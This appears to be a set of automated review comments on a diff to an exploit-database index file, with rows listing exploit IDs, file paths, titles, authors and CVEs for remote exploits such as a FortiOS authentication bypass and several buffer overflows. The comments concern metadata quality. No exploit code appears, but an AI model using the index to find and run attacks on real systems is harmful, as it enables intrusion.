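Review bot: The source_url for 52227 is a Google Drive share link (`https://drive.google.com/file/d/.../view?usp=drive_link`), which is neither a stable archive nor the kind of upstream reference the other rows in this hunk use (the Metasploit rows pin a GitHub commit URL). A Drive file can be revoked or replaced after publication without any change to the index, so mirror the referenced artifact under the exploit-db hosting path used by other rows (or drop the column) and record a hash of the artifact in the exploit file so readers can verify what they fetched. The description also mixes a model name with a library version ("Transformers MobileViTV2 4.41.1"); "Hugging Face Transformers 4.41.1 (MobileViTV2) - Remote Code Execution (RCE)" makes clear which component the version belongs to.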
@ -43283,6 +43304,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35509,exploits/windows/remote/35509.pl,"FLVPlayer4Free 2.9 - '.fp4f' Remote Buffer Overflow",2011-03-27,KedAns-Dz,remote,windows,,2011-03-27,2014-12-09,1,,,,,,https://www.securityfocus.com/bid/47045/info
3063,exploits/windows/remote/3063.pl,"Formbankserver 1.9 - 'Name' Directory Traversal",2007-01-01,Bl0od3r,remote,windows,,2006-12-31,,1,OSVDB-32545;CVE-2007-0055,,,,,
19942,exploits/windows/remote/19942.txt,"Fortech Proxy+ 2.30 - Remote Administration",1999-12-26,anonymous,remote,windows,,1999-12-26,2012-07-19,1,OSVDB-84754,,,,,https://www.securityfocus.com/bid/1226/info
52239,exploits/windows/remote/52239.py,"Fortinet FortiOS_ FortiProxy_ and FortiSwitchManager 7.2.0 - Authentication bypass",2025-04-16,ub3rsick,remote,windows,,2025-04-16,2025-04-16,0,CVE-2022-40684,,,,,
44941,exploits/windows/remote/44941.txt,"Foxit Reader 9.0.1.1049 - Remote Code Execution",2018-06-25,mr_me,remote,windows,,2018-06-25,2018-06-25,1,CVE-2018-9958;CVE-2018-9948,"Use After Free (UAF)",,http://www.exploit-db.com/screenshots/idlt45000/poc.png,http://www.exploit-db.comFoxitReader901_enu_Setup_Prom.exe,
24502,exploits/windows/remote/24502.rb,"Foxit Reader Plugin - URL Processing Buffer Overflow (Metasploit)",2013-02-14,Metasploit,remote,windows,,2013-02-14,2013-02-14,1,OSVDB-89030,"Metasploit Framework (MSF)",,,http://www.exploit-db.comFoxitReader544.1128_enu_Setup.exe,http://secunia.com/advisories/51733/
854,exploits/windows/remote/854.cpp,"Foxmail 1.1.0.1 - POP3 Temp Dir Stack Overflow",2005-03-02,Swan,remote,windows,110,2005-03-01,,1,OSVDB-14370;CVE-2005-0635,,,,,
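Review bot: 52239 is filed under exploits/windows/remote with platform "windows", but FortiOS, FortiProxy and FortiSwitchManager are Fortinet appliance firmware rather than Windows software, and the exploit itself is a Python script (52239.py); file it under a platform that matches the target (the index already uses "hardware" and "multiple" for appliance and cross-platform entries) so that platform filters do not surface it for Windows hosts. Also capitalise "Authentication bypass" as "Authentication Bypass" to match 47474 and 24235, and consider populating the tag column with the same `"Authentication Bypass / Credentials Bypass (AB/CB)"` value 47474 carries.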
@ -45834,6 +45856,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35434,exploits/windows/remote/35434.txt,"WebKit 1.2.x - Local Webpage Cross Domain Information Disclosure",2011-03-09,"Aaron Sigel",remote,windows,,2011-03-09,2014-12-03,1,CVE-2011-0167;OSVDB-73773,,,,,https://www.securityfocus.com/bid/46816/info
20125,exploits/windows/remote/20125.txt,"Weblogic 3.1.8/4.0.4/4.5.1 - Remote Command Execution",2000-08-01,"Foundstone Inc.",remote,windows,,2000-08-01,2012-07-31,1,CVE-2000-0685;OSVDB-59351,,,,,https://www.securityfocus.com/bid/1525/info
29843,exploits/windows/remote/29843.txt,"webMethods Glue 6.5.1 Console - Directory Traversal",2007-04-11,"Patrick Webster",remote,windows,,2007-04-11,2013-11-27,1,CVE-2007-2048;OSVDB-34992,,,,,https://www.securityfocus.com/bid/23423/info
52237,exploits/windows/remote/52237.txt,"WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page",2025-04-16,"Rasime Ekici",remote,windows,,2025-04-16,2025-04-16,0,CVE-2024-23733,,,,,
3395,exploits/windows/remote/3395.c,"WebMod 0.48 - Content-Length Remote Buffer Overflow",2007-03-01,cybermind,remote,windows,,2007-02-28,,1,OSVDB-33834;CVE-2007-1260,,,,,
23411,exploits/windows/remote/23411.txt,"Websense Enterprise 4/5 - Blocked Sites Cross-Site Scripting",2003-12-03,"Mr. P.Taylor",remote,windows,,2003-12-03,2012-12-16,1,OSVDB-2901,,,,,https://www.securityfocus.com/bid/9149/info
16802,exploits/windows/remote/16802.rb,"Webster HTTP Server - GET Buffer Overflow (Metasploit)",2010-11-03,Metasploit,remote,windows,,2010-11-03,2011-03-07,1,CVE-2002-2268;OSVDB-44106,"Metasploit Framework (MSF)",,,,
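Review bot: 52237 spells the product "WebMethods" while the existing row 29843 uses the vendor's casing "webMethods", which also affects where a case-sensitive sort places the row; and "Improper Access on Login Page" names neither a weakness class nor an impact, so the entry cannot be classified from the index alone. Suggest "webMethods Integration Server 10.15.0.0000-0092 - Improper Access Control (Login Page)", or whatever class the CVE-2024-23733 advisory assigns, and fill the tag column to match.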